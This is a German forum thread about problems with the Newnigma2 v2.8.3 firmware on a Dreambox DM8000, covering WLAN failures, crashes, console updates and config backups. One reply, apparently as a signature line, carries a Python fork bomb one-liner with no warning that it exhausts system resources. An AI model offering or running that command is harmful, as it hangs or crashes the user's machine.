DM8000: Newnigma2 v2.8.3

• habe schon sehnsüchtigst auf die fest einstellbare dvd speed gewartet, und es funkt perfekt!! :)

aber..., ich kann mit der 800 nicht mehr auf die 8k zugreifen )-:
      die einstellungen bei der 8k (nfs editor) sind gleich wie bei 2.8.2. der zugriff mit dem netzwerbrowser der 800 klappt aber nicht.
    • So,
      habs neu geflasht und kann bis jetzt nicht negatives berichten.

Ich persönlich würde es nett finden wenn man das verlinken des USB wieder in den devicemanagers aufnehmen könnte.( da ich meinen usb am dvd recorder anschluss angeschlossen hab, musste ich ihn verlinken )

smargos laufen beide perfekt.

gruß und dank
      juppi
    • Original von hilde
      Ähm update via Console ergibt bei mir eine Fehlermeldung am Schluss:

update-alternatives: Linking //usr/bin/opkg to /usr/bin/opkg-cl
      Configuring opkg-ipkg-compat
      file_move: ERROR: failed to rename /autofs/sdb1//usr/lib/ipkg/status.tmp to /au
      ofs/sdb1//usr/lib/ipkg/status: No such file or directory
      root@dm8000:~# reboot

Ist das so ok??

jo das ist einer der gründe warum wir auf opkg gewechselt sind
      python -c 'while 1: __import__("os").fork()'
      Wer der Herde hinterher läuft frisst nur Scheisse , nicht das Gras !
    • Original von Mr. Blue
      Online Installation hat beim 2.ten Versuch zwar problemlos geklappt; allerdings habe ich jetzt wieder das gleiche WLAN-Problem wie bereits bei der 2.80, das bei der 2.81 und 2.82 behoben war. Ich bekomme zwar das WLAN-Netz angezeigt; alle Parameter passen, aber keine Verbindung - gehe erst mal wieder zurück auf die 2.82 ?(

*** nach Rücksprung auf die "alte" Fassung geht in Sachen WLAN wieder alles

bei mir genau das selbe!seit dem update auf 2.8.3 spinnt meine wlan verbindung,wie oben von mr. blue beschrieben! :(

wie kann ich am besten zurückupdaten auf 2.8.2 bzw kann ich an der box über den online feed erneut updaten??

übrigens,hatte ich auch beim ersten update über den server etwa in der mitte einen crash/greenscreen...

danke an das newnigma team!

Dieser Beitrag wurde bereits 1 mal editiert, zuletzt von TechOne ()

• Original von TechOne
      Original von Mr. Blue
      Online Installation hat beim 2.ten Versuch zwar problemlos geklappt; allerdings habe ich jetzt wieder das gleiche WLAN-Problem wie bereits bei der 2.80, das bei der 2.81 und 2.82 behoben war. Ich bekomme zwar das WLAN-Netz angezeigt; alle Parameter passen, aber keine Verbindung - gehe erst mal wieder zurück auf die 2.82 ?(

bei mir genau das selbe!seit dem update auf 2.8.3 spinnt meine wlan verbindung,wie oben von mr. blue beschrieben! :(

wie kann ich am besten zurückupdaten auf 2.8.2 bzw kann ich an der box über den online feed erneut updaten??

übrigens,hatte ich auch beim ersten update über den server etwa in der mitte einen crash/greenscreen...

das image ist in der database der dritte button von rechts neben board und portal :)
    • Bei mir auch crash beim ersten onlineupdate, zweiter Versuch hat dann den Rest runtergeladen und zunächst schien auch alles zu laufen.

Später hab ich dann doch noch ein Problem gefunden:
      Beim Aufruf der Anrufliste des FritzBox-Plugins gabs immer einen Greenscreen mit
      neustart der GUI. Fehlermeldung war sinngemäss eine fehlende "red.png", also
      ein Buttonpic. Die Pfadangabe war aber mehr als seltsam, sie zeigte auf irgendeinen
      "Kerni-HD1"-Skin den ich (soweit ich mich erinnere) nie installiert hatte.

Ich hab dann einfach den Skin zusätzlich installiert (aber nicht aktiviert) und seitdem
      geht auch wieder die Anrufliste, sie wird nur eben in einem anderen Skin dargestellt
      als alles andere 8o

Nur als Hinweis wo vielleicht noch was hakt.

Dieser Beitrag wurde bereits 1 mal editiert, zuletzt von josh222 ()

• Original von oZxS
      Original von TechOne
      Original von Mr. Blue

das image ist in der database der dritte button von rechts neben board und portal :)

hey,

wenn ich jetzt aber wieder 2.8.2 draufspiele gehen doch all meine bouquets,configs,plugins usw flöten oder??

ich würde ja gern mit dem Configsaver ein backup machen,jedoch kommen wir da gleich zum nächsten problem -> meine externe festplatte kann einfach nicht initialisiert werden,mount failed.obwohl sie mit ext3 formatiert, nach autofs gemountet wurde und der aufnahmepfad media/hdd/movie bereits drin ist.. ;(

ich hab trotzdem mal den configsaver laufen lasse,steht zwar dann da config gespeichert mit paar fehlern,aber wenn die platte nicht initialisiert werden kann,zweifle ich ohnehin ob jetzt auf meine externe platte ein backup erstellt wurde.
    • Original von oZxS
      speicher die sachen doch auf einen usbstick ?

ja gut,den muss ich doch auch erstmal formatieren/initialisieren/mounten oder dergleichen,ist ja auch nicht plug&play.ich probiers mal aus.

• Hi,

Also das Update über die Konsole führte bei mir auch zum Crash, die Software habe ich
      neu geflashed. Nun habe ich aber ein weiteres Problem; bei angeschlossener externer Fesplatte über USB mit Windows-Partition crashed die DM8000 beim Bootvorgang in einer Endlosschleife.

greetings
    • Original von digiview
      Hi,

Also das Update über die Konsole führte bei mir auch zum Crash, die Software habe ich
      neu geflashed. Nun habe ich aber ein weiteres Problem; bei angeschlossener externer Fesplatte über USB mit Windows-Partition crashed die DM8000 beim Bootvorgang in einer Endlosschleife.

greetings

kann ich auch bestätigen!kommt zwar nicht regelmäßig vor,aber kommt vor.

ganz kurze frage noch bitte bevor ich auf 2.8.2 "downdate":

wenn ich mit dem Configsaver ein vollbackup durchführe,wird dann auch das Image mit ins backup gepackt??weil das Image will ich ja dann nicht backuppen,wenn ich auf 2.8.2 zurückgehe.

Danke im Voraus

• Original von Dumbo
      Es werden nur Config-Files gespeichert. Keine kompletten Images.

ok danke!

kann ich das unter newnigma erstellte config backup dann auch unter anderen images wiederherstellen?

• bei mir hat es leider nicht geklappt.

Erst einmal Update per telnet, Box startet fast komplett, dann Greenscreen.

Danach das 2.83 komplett neu in den Flash. Box startet bis zu den Eingabe Managern. Die habe ich dann abgebrochen um das Backup einzuspeilen - Greenscreen.

Dann 2.80 in den flach, Backup zurück, Box läuft wieder.

Ich laß erst mal die Finger davon.
    • Du musst die Start-Assistenten schon durchlaufen lassen, damit die Dreambox soweit initialisiert ist und NICHT abbrechen. Einen Suchlauf musst Du dabei nicht machen, da Du ja spaeter ueber die Sicherung die Settings-Liste wieder einspielst!
      Klappt hier mehrfach wunderbar!
      "Remember, if it's psychobilly, it's gotta have some rockabilly in it somwhere. It ain't just punk with a double bass." (P.Paul Fenech)
    • Beim Update über telnet bin ich ja garnicht bis zu den Startassistenten gekommen.

Werde heute Abend nochmal neu flashen mit 2.83 und Start-Assis komplett durchlaufen lassen.

Danke für den Hinweis, werden nie wieder die Assis abbrechen, dachte diese Daten kommen über das Backup zurück.

Man lernt halt nicht aus.